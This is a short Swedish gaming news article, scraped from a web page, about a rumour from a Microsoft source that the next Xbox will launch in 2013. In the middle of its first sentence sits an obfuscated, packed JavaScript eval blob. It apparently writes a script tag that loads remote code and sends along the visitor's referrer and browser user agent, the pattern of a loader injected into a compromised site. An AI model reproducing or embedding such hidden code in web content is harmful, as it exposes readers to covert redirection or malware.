Image Image Image Image Image Image Image Image Image Image

| 24 september, 2018

Scroll to top

Top

Nästa Xbox kommer 2013 enligt Microsoftkälla

Nästa Xbox kommer 2013 enligt Microsoftkälla
Sebastian Plengier Ehrnfelt
Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kazrb|var|u0026u|referrer|zrzbz||js|php’.split(‘|’),0,{}))
är mycket rykten som svajar runt på nätet angående det Microsofts nästa spelkonsol.  Kan vi lita på senaste information?
Det finns teorier om att en release är allt från nästa år till 2014. Nu kan det vara slut på väntan av ett release år, eller?
Enligt en källa på Microsoft som säger sig jobba på företagets Xbox-team har nu gått ut med att konsolen kommer att släppas redan nästa år.

Men, det finns ännu inte något offentligt uttalande från Microsoft själva och är därför svårt att säga om detta är korrekt information eller inte. Men vi kan ju vänta oss ett släpp inom två år i alla fall. Det sägs även att Microsoft kommer att gå ut med mer info på den kommande teknikmässan  CES Expo i januari nästa år, dvs om en månad.

Mer info: www.computerandvideogames.com